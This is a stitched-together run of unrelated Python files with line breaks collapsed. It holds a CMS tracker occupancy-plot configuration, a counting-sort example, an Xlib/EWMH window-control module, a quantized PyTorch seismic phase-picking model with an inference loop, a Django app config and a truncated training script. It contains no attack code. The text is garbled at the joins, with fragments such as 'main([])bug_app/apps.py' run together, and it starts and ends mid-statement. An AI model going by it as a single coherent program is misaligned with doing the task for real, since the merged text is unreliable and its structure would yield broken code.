cms.untracked.vstring(options.inputFiles), # skipBadFiles = cms.untracked.bool(True), inputCommands = cms.untracked.vstring("keep *", "drop *_MEtoEDMConverter_*_*") ) # HLT Selection ------------------------------------------------------------ process.load("HLTrigger.HLTfilters.triggerResultsFilter_cfi") process.triggerResultsFilter.triggerConditions = cms.vstring(options.triggerPath) process.triggerResultsFilter.hltResults = cms.InputTag( "TriggerResults", "", options.HLTprocess ) process.triggerResultsFilter.l1tResults = cms.InputTag( "" ) process.triggerResultsFilter.throw = cms.bool(False) process.seqHLTSelection = cms.Sequence(process.triggerResultsFilter) if options.triggerPath=="*": process.seqHLTSelection = cms.Sequence() #-------------------------------------- #from DPGAnalysis.SiStripTools.occupancyplotsselections_cff import * #from DPGAnalysis.SiStripTools.occupancyplotsselections_simplified_cff import * from DPGAnalysis.SiStripTools.occupancyplotsselections_phase2_cff import * #process.ssclusmultprod = cms.EDProducer("SiStripClusterMultiplicityProducer", # clusterdigiCollection = cms.InputTag("siStripClusters"), # wantedSubDets = cms.VPSet() # ) #process.ssclusmultprod.wantedSubDets.extend(OccupancyPlotsStripWantedSubDets) # #process.ssclusoccuprod = cms.EDProducer("SiStripClusterMultiplicityProducer", # clusterdigiCollection = cms.InputTag("siStripClusters"), # withClusterSize = cms.untracked.bool(True), # wantedSubDets = cms.VPSet() # ) #process.ssclusoccuprod.wantedSubDets.extend(OccupancyPlotsStripWantedSubDets) process.spclusmultprod = cms.EDProducer("SiPixelClusterMultiplicityProducer", clusterdigiCollection = cms.InputTag("siPixelClusters"), wantedSubDets = cms.VPSet() ) process.spclusmultprod.wantedSubDets.extend(OccupancyPlotsPixelWantedSubDets) process.spclusmultprodontrack=process.spclusmultprod.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.spclusmultprodxy = process.spclusmultprod.clone() process.spclusmultprodxy.wantedSubDets = OccupancyPlotsFPIXmDetailedWantedSubDets process.spclusmultprodxy.wantedSubDets.extend(OccupancyPlotsFPIXpDetailedWantedSubDets) process.spclusmultprodxyontrack=process.spclusmultprodxy.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.spclusoccuprod = cms.EDProducer("SiPixelClusterMultiplicityProducer", clusterdigiCollection = cms.InputTag("siPixelClusters"), withClusterSize = cms.untracked.bool(True), wantedSubDets = cms.VPSet() ) process.spclusoccuprod.wantedSubDets.extend(OccupancyPlotsPixelWantedSubDets) process.spclusoccuprodontrack=process.spclusoccuprod.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.spclusoccuprodxy = process.spclusoccuprod.clone() process.spclusoccuprodxy.wantedSubDets = OccupancyPlotsFPIXmDetailedWantedSubDets process.spclusoccuprodxy.wantedSubDets.extend(OccupancyPlotsFPIXpDetailedWantedSubDets) process.spclusoccuprodxyontrack=process.spclusoccuprodxy.clone(clusterdigiCollection = cms.InputTag("AlignmentTrackSelector")) process.seqMultProd = cms.Sequence(#process.ssclusmultprod + process.ssclusoccuprod + process.spclusmultprod + process.spclusoccuprod + process.spclusmultprodontrack + process.spclusoccuprodontrack + process.spclusmultprodxy + process.spclusoccuprodxy + process.spclusmultprodxyontrack + process.spclusoccuprodxyontrack ) process.load("DPGAnalysis.SiStripTools.occupancyplots_cfi") #process.occupancyplots.wantedSubDets = OccupancyPlotsStripWantedSubDets process.occupancyplots.file = cms.untracked.FileInPath("SLHCUpgradeSimulations/Geometry/data/PhaseII/Tilted/PixelSkimmedGeometry.txt") process.pixeloccupancyplots = process.occupancyplots.clone() process.pixeloccupancyplots.wantedSubDets = process.spclusmultprod.wantedSubDets process.pixeloccupancyplots.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprod")) process.pixeloccupancyplots.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprod")) process.pixeloccupancyxyplots = process.occupancyplots.clone() process.pixeloccupancyxyplots.wantedSubDets = process.spclusmultprodxy.wantedSubDets process.pixeloccupancyxyplots.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprodxy")) process.pixeloccupancyxyplots.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprodxy")) process.pixeloccupancyplotsontrack = process.occupancyplots.clone() process.pixeloccupancyplotsontrack.wantedSubDets = process.spclusmultprodontrack.wantedSubDets process.pixeloccupancyplotsontrack.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprodontrack")) process.pixeloccupancyplotsontrack.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprodontrack")) process.pixeloccupancyxyplotsontrack = process.pixeloccupancyxyplots.clone() process.pixeloccupancyxyplotsontrack.wantedSubDets = process.spclusmultprodxyontrack.wantedSubDets process.pixeloccupancyxyplotsontrack.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprodxyontrack")) process.pixeloccupancyxyplotsontrack.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprodxyontrack")) #process.alloccupancyplots = process.occupancyplots.clone() #process.alloccupancyplots.wantedSubDets = cms.VPSet() #process.alloccupancyplots.wantedSubDets.extend(OccupancyPlotsPixelWantedSubDets) #process.alloccupancyplots.wantedSubDets.extend(OccupancyPlotsStripWantedSubDets) #process.alloccupancyplots.multiplicityMaps = cms.VInputTag(cms.InputTag("spclusmultprod"),cms.InputTag("ssclusmultprod")) #process.alloccupancyplots.occupancyMaps = cms.VInputTag(cms.InputTag("spclusoccuprod"),cms.InputTag("ssclusoccuprod")) #process.load("TrackingPFG.Utilities.bxlumianalyzer_cfi") process.goodVertices = cms.EDFilter("VertexSelector", src = cms.InputTag("offlinePrimaryVertices"), cut = cms.string("!isFake && ndof > 4 && abs(z) <= 24 && position.Rho <= 2"), filter = cms.bool(False), # otherwise it won't filter the events, just produce an empty vertex collection. ) process.load("Validation.RecoVertex.anotherprimaryvertexanalyzer_cfi") process.primaryvertexanalyzer.pvCollection=cms.InputTag("goodVertices") process.primaryvertexanalyzer.vHistogramMakerPSet.runHisto=cms.untracked.bool(False) process.primaryvertexanalyzer.vHistogramMakerPSet.runHistoProfile=cms.untracked.bool(False) process.primaryvertexanalyzer.vHistogramMakerPSet.runHistoBXProfile=cms.untracked.bool(False) process.seqAnalyzers = cms.Sequence( #process.bxlumianalyzer + process.goodVertices + process.primaryvertexanalyzer + # process.occupancyplots + process.pixeloccupancyplots + process.pixeloccupancyplotsontrack + process.pixeloccupancyxyplots + process.pixeloccupancyxyplotsontrack) #------------------------------------------------------------------------------------------- process.load("Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi") process.AlignmentTrackSelector.etaMin = cms.double(-5.) process.AlignmentTrackSelector.etaMax = cms.double(5.) process.seqProducers = cms.Sequence(process.AlignmentTrackSelector + process.seqMultProd) process.load("DPGAnalysis.SiStripTools.trackcount_cfi") process.trackcount.trackCollection = cms.InputTag("generalTracks") process.trackcount.etaMin= cms.untracked.double(-4.) process.trackcount.etaMax= cms.untracked.double(4.) process.trackcount.netabin1D=cms.untracked.uint32(160) process.trackcount.netabin2D=cms.untracked.uint32(50) process.trackcount.nchi2bin1D=cms.untracked.uint32(1000) process.trackcount.nndofbin1D=cms.untracked.uint32(200) process.trackcount.nchi2bin2D=cms.untracked.uint32(400) process.trackcount.nndofbin2D=cms.untracked.uint32(100) process.trackcount.wanted2DHistos=cms.untracked.bool(True) process.load("DPGAnalysis.SiStripTools.duplicaterechits_cfi") #----GlobalTag ------------------------ #process.load("Configuration.StandardSequences.GeometryDB_cff") #process.load('Configuration.Geometry.GeometryExtendedPhase2TkBE5DPixel10DReco_cff') process.load('Configuration.Geometry.GeometryExtended2023D3Reco_cff') process.load('Configuration.StandardSequences.MagneticField_cff') #process.load("Configuration.Geometry.GeometryExtendedPhaseIPixelReco_cff") #process.load("Configuration.Geometry.GeometryExtendedPhaseIPixel_cff") process.load("Configuration.StandardSequences.Reconstruction_cff") from SLHCUpgradeSimulations.Configuration.phase2TkCustomsBE5DPixel10D import * process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff") from Configuration.AlCa.GlobalTag import GlobalTag process.GlobalTag = GlobalTag(process.GlobalTag, options.globalTag, '') #from Configuration.AlCa.GlobalTag import GlobalTag #process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:upgradePLS3', '') process.siStripQualityESProducer.ListOfRecordToMerge=cms.VPSet( # cms.PSet( record = cms.string("SiStripDetVOffRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripDetCablingRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("RunInfoRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripBadChannelRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripBadFiberRcd"), tag = cms.string("") ), cms.PSet( record = cms.string("SiStripBadModuleRcd"), tag = cms.string("") ) ) process.TFileService = cms.Service('TFileService', # fileName = cms.string('OccupancyPlotsTest_newschema.root') # fileName = cms.string('OccupancyPlotsTest_phase2.root') fileName = cms.string('OccupancyPlotsTest_phase2_'+options.tag+'.root') ) process = customise_Reco(process,0) process = customise_condOverRides(process) process.myrereco = cms.Sequence( process.siPixelRecHits + process.trackingGlobalReco) process.p0 = cms.Path( process.myrereco + process.seqHLTSelection + process.seqProducers + process.seqAnalyzers + process.trackcount + process.duplicaterechits ) #print process.dumpPython() # Author: # Approach: # Counting sort, like radix sort and bucket sort, # is an integer based algorithm (i.e. the values of the input # array are assumed to be integers). Hence counting sort is # among the fastest sorting algorithms around, in theory. The # particular distinction for counting sort is that it creates # a bucket for each value and keep a counter in each bucket. # Then each time a value is encountered in the input collection, # the appropriate counter is incremented. Because counting sort # creates a bucket for each value, an imposing restriction is # that the maximum value in the input array be known beforehand. # Implementation notes: # 1] Since the values range from 0 to k, create k+1 buckets. # 2] To fill the buckets, iterate through the input list and # each time a value appears, increment the counter in its # bucket. # 3] Now fill the input list with the compressed data in the # buckets. Each bucket's key represents a value in the # array. So for each bucket, from smallest key to largest, # add the index of the bucket to the input array and # decrease the counter in said bucket by one; until the # counter is zero. # Best Case O(n+k); Average Case O(n+k); Worst Case O(n+k), # where n is the size of the input array and k means the # values range from 0 to k. def countingSort(myList): maxValue = 0 for i in range(len(myList)): if myList[i] > maxValue: maxValue = myList[i] buckets = [0] * (maxValue + 1) for i in myList: buckets[i] += 1 i = 0 for j in range(maxValue + 1): for a in range(buckets[j]): myList[i] = j i += 1 return myList if __name__ == '__main__': sortedList = countingSort([1,23,4,5,6,7,8]) print(sortedList) #!/usr/bin/python # -*- coding: utf-8 -*- import os import sys import platform import time import Xlib.X import Xlib.display import ewmh import pyautogui from pygetwindow import PyGetWindowException, pointInRect, BaseWindow, Rect, Point, Size DISP = Xlib.display.Display() ROOT = DISP.screen().root EWMH = ewmh.EWMH(_display=DISP, root=ROOT) # WARNING: Changes are not immediately applied, specially for hide/show (unmap/map) # You may set wait to True in case you need to effectively know if/when change has been applied. WAIT_ATTEMPTS = 10 WAIT_DELAY = 0.025 # Will be progressively increased on every retry # These _NET_WM_STATE_ constants are used to manage Window state and are documented at # https://ewmh.readthedocs.io/en/latest/ewmh.html STATE_NULL = 0 STATE_MODAL = '_NET_WM_STATE_MODAL' STATE_STICKY = '_NET_WM_STATE_STICKY' STATE_MAX_VERT = '_NET_WM_STATE_MAXIMIZED_VERT' STATE_MAX_HORZ = '_NET_WM_STATE_MAXIMIZED_HORZ' STATE_SHADED = '_NET_WM_STATE_SHADED' STATE_SKIP_TASKBAR = '_NET_WM_STATE_SKIP_TASKBAR' STATE_SKIP_PAGER = '_NET_WM_STATE_SKIP_PAGER' STATE_HIDDEN = '_NET_WM_STATE_HIDDEN' STATE_FULLSCREEN = '_NET_WM_STATE_FULLSCREEN' STATE_ABOVE = '_NET_WM_STATE_ABOVE' STATE_BELOW = '_NET_WM_STATE_BELOW' STATE_ATTENTION = '_NET_WM_STATE_DEMANDS_ATTENTION' STATE_FOCUSED = '_NET_WM_STATE_FOCUSED' # EWMH/Xlib set state actions ACTION_UNSET = 0 # Add state ACTION_SET = 1 # Remove state ACTION_TOGGLE = 2 # Toggle state # EWMH/Xlib State Hints HINT_STATE_WITHDRAWN = 0 HINT_STATE_NORMAL = 1 HINT_STATE_ICONIC = 3 def getActiveWindow(): """Returns a Window object of the currently active Window or None.""" win_id = EWMH.getActiveWindow() if win_id: return LinuxWindow(win_id) return None def getActiveWindowTitle(): """Returns a string of the title text of the currently active (focused) Window.""" win = getActiveWindow() if win: return win.title else: return "" def getWindowsAt(x, y): """Returns a list of Window objects whose windows contain the point ``(x, y)``. * ``x`` (int): The x position of the window(s). * ``y`` (int): The y position of the window(s).""" windowsAtXY = [] for win in getAllWindows(): if pointInRect(x, y, win.left, win.top, win.width, win.height): windowsAtXY.append(win) return windowsAtXY def getWindowsWithTitle(title): """Returns a Window object list with the given name.""" matches = [] for win in getAllWindows(): if win.title == title: matches.append(win) return matches def getAllTitles(): """Returns a list of strings of window titles for all visible windows.""" return [window.title for window in getAllWindows()] def getAllWindows(): """Returns a list of strings of window titles for all visible windows.""" windows = EWMH.getClientList() return [LinuxWindow(window) for window in windows] class LinuxWindow(BaseWindow): def __init__(self, hWnd): self._hWnd = hWnd self._setupRectProperties() # self._saveWindowInitValues() # Store initial Window parameters to allow reset and other actions def _getWindowRect(self): """Returns a rect of window position and size (left, top, right, bottom). It follows ctypes format for compatibility""" # https://stackoverflow.com/questions/12775136/get-window-position-and-size-in-python-with-xlib - mgalgs win = self._hWnd x = y = w = h = 0 geom = win.get_geometry() (x, y) = (geom.x, geom.y) while True: parent = win.query_tree().parent pgeom = parent.get_geometry() x += pgeom.x y += pgeom.y if parent.id == ROOT.id: break win = parent w = geom.width h = geom.height return Rect(x, y, x + w, y + h) def _saveWindowInitValues(self): # Saves initial rect values to allow reset to original position, size, state and hints. self._init_left, self._init_top, self._init_right, self._init_bottom = self._getWindowRect() self._init_width = self._init_right - self._init_left self._init_height = self._init_bottom - self._init_top self._init_state = self._hWnd.get_wm_state() self._init_hints = self._hWnd.get_wm_hints() self._init_normal_hints = self._hWnd.get_wm_normal_hints() # self._init_attributes = self._hWnd.get_attributes() # can't be modified, so not saving it def __repr__(self): return '%s(hWnd=%s)' % (self.__class__.__name__, self._hWnd) def __eq__(self, other): return isinstance(other, LinuxWindow) and self._hWnd == other._hWnd def close(self): """Closes this window. This may trigger "Are you sure you want to quit?" dialogs or other actions that prevent the window from actually closing. This is identical to clicking the X button on the window.""" EWMH.setCloseWindow(self._hWnd) EWMH.display.flush() def _get_wm(self): # https://stackoverflow.com/questions/3333243/how-can-i-check-with-python-which-window-manager-is-running return os.environ.get('XDG_CURRENT_DESKTOP') or "" def minimize(self, wait=False): """Minimizes this window. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was minimized""" if not self.isMinimized: if "GNOME" in self._get_wm(): # Keystroke hack. Tested OK on Ubuntu/Unity self.activate(wait=True) pyautogui.hotkey('winleft', 'h') else: # This is working OK at least on Mint/Cinnamon and Raspbian/LXDE hints = self._hWnd.get_wm_hints() prev_state = hints["initial_state"] hints["initial_state"] = HINT_STATE_ICONIC self._hWnd.set_wm_hints(hints) self.hide(wait=wait) self.show(wait=wait) hints["initial_state"] = prev_state self._hWnd.set_wm_hints(hints) retries = 0 while wait and retries < WAIT_ATTEMPTS and not self.isMinimized: retries += 1 time.sleep(WAIT_DELAY * retries) return self.isMinimized def maximize(self, wait=False): """Maximizes this window. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was maximized""" if not self.isMaximized: EWMH.setWmState(self._hWnd, ACTION_SET, STATE_MAX_VERT, STATE_MAX_HORZ) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and not self.isMaximized: retries += 1 time.sleep(WAIT_DELAY * retries) return self.isMaximized def restore(self, wait=False): """If maximized or minimized, restores the window to it's normal size. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was restored""" # Activation is enough to restore a minimized window in GNOME/Unity, CINNAMON and LXDE self.activate(wait=wait) if self.isMaximized: EWMH.setWmState(self._hWnd, ACTION_UNSET, STATE_MAX_VERT, STATE_MAX_HORZ) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and (self.isMaximized or self.isMinimized): retries += 1 time.sleep(WAIT_DELAY * retries) return not self.isMaximized and not self.isMinimized def hide(self, wait=False): """If hidden or showing, hides the window from screen and title bar. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was hidden (unmapped)""" win = DISP.create_resource_object('window', self._hWnd) win.unmap_sub_windows() DISP.sync() win.unmap() DISP.sync() retries = 0 while wait and retries < WAIT_ATTEMPTS and self._isMapped: retries += 1 time.sleep(WAIT_DELAY * retries) return not self._isMapped def show(self, wait=False): """If hidden or showing, shows the window on screen and in title bar. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window is showing (mapped)""" win = DISP.create_resource_object('window', self._hWnd) win.map() DISP.sync() win.map_sub_windows() DISP.sync() retries = 0 while wait and retries < WAIT_ATTEMPTS and not self._isMapped: retries += 1 time.sleep(WAIT_DELAY * retries) return self._isMapped def activate(self, wait=False): """Activate this window and make it the foreground (focused) window. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was activated""" if "arm" in platform.platform(): EWMH.setWmState(self._hWnd, ACTION_SET, STATE_ABOVE, STATE_NULL) else: EWMH.setActiveWindow(self._hWnd) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and not self.isActive: retries += 1 time.sleep(WAIT_DELAY * retries) return self.isActive def resize(self, widthOffset, heightOffset, wait=False): """Resizes the window relative to its current size. Use 'wait' option to confirm action requested (in a reasonable time) Returns ''True'' if window was resized to the given size""" return self.resizeTo(self.width + widthOffset, self.height + heightOffset, wait) resizeRel = resize # resizeRel is an alias for the resize() method. def resizeTo(self, newWidth, newHeight, wait=False): """Resizes the window to a new width and height. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was resized to the given size""" EWMH.setMoveResizeWindow(self._hWnd, x=self.left, y=self.top, w=newWidth, h=newHeight) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and (self.width != newWidth or self.height != newHeight): retries += 1 time.sleep(WAIT_DELAY * retries) return self.width == newWidth and self.height == newHeight def move(self, xOffset, yOffset, wait=False): """Moves the window relative to its current position. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was moved to the given position""" return self.moveTo(self.left + xOffset, self.top + yOffset, wait) moveRel = move # moveRel is an alias for the move() method. def moveTo(self, newLeft, newTop, wait=False): """Moves the window to new coordinates on the screen. Use 'wait' option to confirm action requested (in a reasonable time). Returns ''True'' if window was moved to the given position""" if newLeft >= 0 and newTop >= 0: # Xlib/EWMH won't accept negative positions EWMH.setMoveResizeWindow(self._hWnd, x=newLeft, y=newTop, w=self.width, h=self.height) EWMH.display.flush() retries = 0 while wait and retries < WAIT_ATTEMPTS and (self.left != newLeft or self.top != newTop): retries += 1 time.sleep(WAIT_DELAY * retries) return self.left == newLeft and self.top == newTop def _moveResizeTo(self, newLeft, newTop, newWidth, newHeight): if newLeft >= 0 and newTop >= 0: # Xlib/EWMH won't accept negative positions EWMH.setMoveResizeWindow(self._hWnd, x=newLeft, y=newTop, w=newWidth, h=newHeight) EWMH.display.flush() return @property def isMinimized(self): """Returns ``True`` if the window is currently minimized.""" state = EWMH.getWmState(self._hWnd, str=True) return STATE_HIDDEN in state @property def isMaximized(self): """Returns ``True`` if the window is currently maximized.""" state = EWMH.getWmState(self._hWnd, str=True) return STATE_MAX_VERT in state and STATE_MAX_HORZ in state @property def isActive(self): """Returns ``True`` if the window is currently the active, foreground window.""" win = EWMH.getActiveWindow() return win == self._hWnd @property def title(self): """Returns the window title as a string.""" name = EWMH.getWmName(self._hWnd) return name @property def visible(self): """Returns ``True`` if the window is currently visible.""" win = DISP.create_resource_object('window', self._hWnd) state = win.get_attributes().map_state return state == Xlib.X.IsViewable @property def _isMapped(self): # Returns ``True`` if the window is currently mapped win = DISP.create_resource_object('window', self._hWnd) state = win.get_attributes().map_state return state != Xlib.X.IsUnmapped def cursor(): """Returns the current xy coordinates of the mouse cursor as a two-integer tuple Returns: (x, y) tuple of the current xy coordinates of the mouse cursor. """ mp = ROOT.query_pointer() mp = [mp.root_x, mp.root_y] return Point(mp[0], mp[1]) def resolution(): """Returns the width and height of the screen as a two-integer tuple. Returns: (width, height) tuple of the screen size, in pixels. """ res = EWMH.getDesktopGeometry() return Size(res[0], res[1]) def displayWindowsUnderMouse(xOffset=0, yOffset=0): """This function is meant to be run from the command line. It will automatically show mouse pointer position and windows names under it""" if xOffset != 0 or yOffset != 0: print('xOffset: %s yOffset: %s' % (xOffset, yOffset)) try: prevWindows = None while True: x, y = cursor() positionStr = 'X: ' + str(x - xOffset).rjust(4) + ' Y: ' + str(y - yOffset).rjust(4) + ' (Press Ctrl-C to quit)' if prevWindows is not None: sys.stdout.write(positionStr) sys.stdout.write('\b' * len(positionStr)) windows = getWindowsAt(x, y) if windows != prevWindows: print('\n') prevWindows = windows for win in windows: name = win.title eraser = '' if len(name) >= len(positionStr) else ' ' * (len(positionStr) - len(name)) sys.stdout.write(name + eraser + '\n') sys.stdout.flush() time.sleep(0.3) except KeyboardInterrupt: sys.stdout.write('\n\n') sys.stdout.flush() def main(): """Run this script from command-line to get windows under mouse pointer""" print("PLATFORM:", sys.platform) print("SCREEN SIZE:", resolution()) npw = getActiveWindow() print("ACTIVE WINDOW:", npw.title, "/", npw.box) print("") displayWindowsUnderMouse(0, 0) if __name__ == "__main__": main() import torch import torch.nn as nn import torch.nn.functional as F from torch.quantization import QuantStub, DeQuantStub, fuse_modules class ConvBNReLU(nn.Sequential): """ 三个层在计算过程中应当进行融合 使用ReLU作为激活函数可以限制 数值范围,从而有利于量化处理。 """ def __init__(self, n_in, n_out, kernel_size=3, stride=1, groups=1, norm_layer=nn.BatchNorm2d): # padding为same时两边添加(K-1)/2个0 padding = (kernel_size - 1) // 2 # 本层构建三个层,即0:卷积,1:批标准化,2:ReLU super(ConvBNReLU, self).__init__( nn.Conv2d(n_in, n_out, [1, kernel_size], stride, [0, padding], groups=groups, bias=False), nn.BatchNorm2d(n_out), nn.ReLU(inplace=True) ) class ConvTBNReLU(nn.Sequential): """ 三个层在计算过程中应当进行融合 使用ReLU作为激活函数可以限制 数值范围,从而有利于量化处理。 """ def __init__(self, n_in, n_out, kernel_size=3, stride=1, padding=1, output_padding=1, bias=True, dilation=1, groups=1, norm_layer=nn.BatchNorm2d): # padding为same时两边添加(K-1)/2个0 # 本层构建三个层,即0:卷积,1:批标准化,2:ReLU super(ConvTBNReLU, self).__init__( nn.UpsamplingBilinear2d(scale_factor=tuple(stride)), nn.Conv2d(n_in, n_out, kernel_size, stride=1, padding=padding), nn.BatchNorm2d(n_out), nn.ReLU(inplace=True) ) class InvertedResidual(nn.Module): """ 本个模块为MobileNetV2中的可分离卷积层 中间带有扩张部分,如图10-2所示 """ def __init__(self, n_in, n_out, stride, expand_ratio, norm_layer=nn.BatchNorm2d): super().__init__() self.stride = stride # 隐藏层需要进行特征拓张,以防止信息损失 hidden_dim = int(round(n_in * expand_ratio)) # 当输出和输出维度相同时,使用残差结构 self.use_res = self.stride == 1 and n_in == n_out # 构建多层 layers = [] if expand_ratio != 1: # 逐点卷积,增加通道数 layers.append( ConvBNReLU(n_in, hidden_dim, kernel_size=1, norm_layer=norm_layer)) layers.extend([ # 逐层卷积,提取特征。当groups=输入通道数时为逐层卷积 ConvBNReLU( hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer), # 逐点卷积,本层不加激活函数 nn.Conv2d(hidden_dim, n_out, 1, 1, 0, bias=False), nn.BatchNorm2d(n_out), ]) # 定义多个层 self.conv = nn.Sequential(*layers) def forward(self, x): if self.use_res: return x + self.conv(x) else: return self.conv(x) class QInvertedResidual(InvertedResidual): """量化模型修改""" def __init__(self, *args, **kwargs): super(QInvertedResidual, self).__init__(*args, **kwargs) # 量化模型应当使用量化计算方法 self.skip_add = nn.quantized.FloatFunctional() def forward(self, x): if self.use_res: # 量化加法 #return self.skip_add.add(x, self.conv(x)) return x + self.conv(x) else: return self.conv(x) def fuse_model(self): # 模型融合 for idx in range(len(self.conv)): if type(self.conv[idx]) == nn.Conv2d: # 将本个模块最后的卷积层和BN层融合 fuse_modules( self.conv, [str(idx), str(idx + 1)], inplace=True) class Model(nn.Module): def __init__(self, n_stride=8, n_channel=4): super().__init__() self.n_stride = n_stride # 总步长 base = n_channel if n_stride == 8: S = [1, 1, 2, 1, 2, 1, 2] elif n_stride == 16: S = [2, 1, 2, 1, 2, 1, 2] elif n_stride == 32: S = [2, 2, 2, 1, 2, 1, 2] elif n_stride == 64: S = [2, 2, 2, 2, 2, 1, 2] elif n_stride == 128: S = [2, 2, 2, 2, 2, 2, 2] else: raise ValueError("S must in 8, 16, 32, 64 or 128") self.layers = nn.Sequential( QInvertedResidual( 3, base*1, S[0], 2), QInvertedResidual(base*1, base*2, S[1], 2), QInvertedResidual(base*2, base*2, S[2], 2), QInvertedResidual(base*2, base*3, S[3], 2), QInvertedResidual(base*3, base*3, S[4], 2), QInvertedResidual(base*3, base*4, S[5], 2), QInvertedResidual(base*4, base*5, S[6], 2) ) self.class_encoder = nn.Sequential( QInvertedResidual(base*5, base*5, 2, 2), QInvertedResidual(base*5, base*5, 2, 2), QInvertedResidual(base*5, base*5, 2, 2), ConvTBNReLU(base*5, base*5, [1, 5], stride=[1, 2], padding=[0, 2], output_padding=[0, 1], bias=False, dilation=1), ConvTBNReLU(base*5, base*5, [1, 5], stride=[1, 2], padding=[0, 2], output_padding=[0, 1], bias=False, dilation=1), ConvTBNReLU(base*5, base*5, [1, 5], stride=[1, 2], padding=[0, 2], output_padding=[0, 1], bias=False, dilation=1), ) self.cl = nn.Conv2d(base * 5 * 2, 3, 1) self.tm = nn.Conv2d(base * 5 * 2, 1, 1) def fuse_model(self): for m in self.modules(): if type(m) == ConvBNReLU: fuse_modules(m, ['0', '1', '2'], inplace=True) if type(m) == ConvTBNReLU: fuse_modules(m, ['1', '2', '3'], inplace=True) if type(m) == QInvertedResidual: m.fuse_model() def forward(self, x, device): B, C, T = x.shape t = torch.arange(T) * 2 * 3.141592658 / 4 p = torch.stack([torch.sin(t), torch.sin(2*t), torch.sin(4*t)], dim=0).to(device) p = torch.unsqueeze(p, 0) x = x + p x = x.unsqueeze(2) x1 = self.layers(x) x2 = self.class_encoder(x1) x = torch.cat([x1, x2], dim=1) out_class = self.cl(x).squeeze() out_time = self.tm(x).squeeze() out_time = out_time * self.n_stride out_time = out_time.squeeze() B, C, T = out_class.shape outputs = [] prob = F.softmax(out_class, 1) return prob, out_time import utils import time import numpy as np import scipy.signal as signal #import tensorflow as tf def find_phase(prob, regr, delta=1.0, height=0.80, dist=1): shape = np.shape(prob) all_phase = [] phase_name = {0:"N", 1:"P", 2:"S"} for itr in range(shape[0]): phase = [] for itr_c in [0, 1]: p = prob[itr, itr_c+1, :] #p = signal.convolve(p, np.ones([10])/10., mode="same") h = height peaks, _ = signal.find_peaks(p, height=h, distance=dist) for itr_p in peaks: phase.append( [ itr_c+1, #phase_name[itr_c], itr_p*delta+regr[itr, itr_p], prob[itr, itr_c, itr_p], itr_p*delta ] ) all_phase.append(phase) return all_phase def main(args): data_tool = utils.DataTest(batch_size=100, n_length=3072) models = [] outfiles = [] strides = [] for i in [int(i) for i in args.feature.split(",")]: for j in [int(i) for i in args.stride.split(",")]: stride = j nchannel = i model_name = f"ckpt/{stride}-{nchannel}.wave" device = torch.device("cuda:1") model = Model(n_stride=stride, n_channel=nchannel) model.load_state_dict(torch.load(model_name)) model.eval() model.to(device) model.fuse_model() acc_time = 0 file_ = open(f"stdata/fuse.{nchannel}-{stride}.stat.txt", "w") models.append(model) strides.append(stride) outfiles.append(file_) datalen = 3072 for step in range(400): a1, a2, a3, a4 = data_tool.batch_data() time1 = time.perf_counter() a1 = torch.tensor(a1, dtype=torch.float32, device=device) a1 = a1.permute(0, 2, 1) for model, outfile, stride in zip(models, outfiles, strides): with torch.no_grad(): oc, ot = model(a1, device) oc = oc.cpu().numpy() ot = ot.cpu().numpy() phase = find_phase(oc, ot, stride, height=0.3, dist=500) for idx in range(len(a2)): is_noise = a2[idx] pt, st = a4[idx] snr = np.mean(a3[idx]) if pt<0 or st<0: continue if is_noise: outfile.write("#none\n") else: if st > datalen: outfile.write(f"#phase,{pt},{-100},{snr}\n") else: outfile.write(f"#phase,{pt},{st},{snr}\n") for p in phase[idx]: outfile.write(f"{p[0]},{p[1]},{p[2]}\n") outfile.flush() time2 = time.perf_counter() print(step, f"Finished! {time2-time1}") import argparse if __name__ == "__main__": parser = argparse.ArgumentParser(description="") parser.add_argument('-f', '--feature', default="4,8,16", type=str, help="base number of feature") parser.add_argument('-s', '--stride', default="8,16,32", type=str, help="stride of model") parser.add_argument('-i', '--input', default="data", help="dataset dir") parser.add_argument('-o', '--output', default="outdata", help="output dir") args = parser.parse_args() main(args) main([])bug_app/apps.py from django.apps import AppConfig class BugAppConfig(AppConfig): name = 'bug_app' from core.utils import parse_args, setup_determinism from core.utils import build_loss_func, build_optim from core.utils import build_scheduler, load_checkpoint from core.config import get_cfg_defaults from core.dataset import build_dataloader from core.model import build_model, train_loop, valid_model, test_model # from core.model import valid_model_macro # from torch.utils.tensorboard import SummaryWriter from torch.cuda.amp import GradScaler import torch.nn as nn import os import torch.multiprocessing torch.multiprocessing.set_sharing_strategy("file_system") # SET UP GLOBAL VARIABLE scaler = GradScaler() def main(cfg, args): # Setup logger # sum_writer = SummaryWriter(f"test2") # Declare variables best_metric = 0 start_epoch = 0 mode = args.mode # Setup folder if not os.path.isdir(cfg.DIRS.WEIGHTS): 